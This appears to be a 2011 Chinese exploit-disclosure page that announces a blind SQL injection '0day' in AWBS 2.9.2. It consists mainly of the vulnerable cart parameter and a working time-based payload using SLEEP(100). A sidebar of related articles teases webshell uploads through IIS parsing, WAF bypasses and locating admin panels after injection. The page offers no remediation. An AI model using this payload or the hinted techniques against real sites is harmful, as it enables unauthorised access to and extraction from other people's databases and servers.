AWBS 2.9.2 Blind SQL 注入0day
发布时间:2011-03-11 11:59:20 作者:佚名 我要评论
AWBS 2.9.2 Blind SQL 注入0day,大家可以参考下。
影响版本:AWBS 2.9.2
官方网站:http://www.awbs.com
漏洞类型:SQL注入
漏洞描述:
---Vulnerability---
http(s)://[HOST]/cart?ca=add_other&oid=[TRUE VALUE]'[BLIND-SQL]
=============================================================================================
---PoC Using Time-Based Blind SQL Injection---
https://www.vulnerablehost.com/cart?ca=add_other&oid=1'%20AND%20SLEEP(100)='
相关文章
- 偶尔在网上看到这些,拿来和大家一块看看,也好让各个站长懂得保护自己的网站2012-10-16
- 安全狗是一款大家熟悉的服务器安全加固产品,据称已经拥有50W的用户量。最近经过一些研究,发现安全狗的一些防护功能,例如SQL注入、文件上传、防webshell等都可以被绕过2014-07-17
- 今天日站发现的.... http://www.xxx.net/manage/Modle/UploadFile/ListFiles.aspx 上传洞洞 上传后没改文件名!可以IIS解析 后面的事,你懂的~ 有点像FC2011-03-11
- 详解:跟以前动易一样注册会员时可以用xx.asp的样式注册。而我们上次的附件图片也都是按照我们的会员名来存放的。那么悲剧的0day就产生了。利用IIS解析特性! 利用2011-03-11
- 有点鸡肋,配合前几天公布的iis6文件名解析漏洞达到获取webshell的目的。2010-09-30
WordPress WassUp插件 spy.php脚本含SQL注入漏洞
受影响系统: WordPress WassUp 1.4 - 1.4.3 不受影响系统: WordPress WassUp 1.4.3a 描述: WordPress是一款免费的论坛Blog系统。 WordPress的WassUp插件2008-10-08- 电脑用久了,装的软件,插件,越来越多,所做的操作也会留下很多垃圾文件保持在电脑上,加上电脑硬件也会老化,电脑中毒什么的。都有可能导致电脑开机速度慢。2012-05-04
- 有时在通过注射得到织梦程序的管理密码时,却发现找不到后台地址。。 这个时候 大家可以尝试下在地址后面加上:/include/dialog/select_media.php?f=form1.murl2011-03-11
- 以下是search.inc.php 文件漏洞利用代码VBS版 [code] Dim strUrl,strSite,strPath,strUid showB() Set Args = Wscript.Arguments If Args.Count <> 3 Then Sho2009-04-18
查找Centos Linux服务器上入侵者的WebShell后门
服务器被挂马或被黑的朋友应该知道,黑客入侵web服务器的第一目标是往服务器上上传一个webshell,有了webshell黑客就可以干更多的事 情2012-07-10
最新评论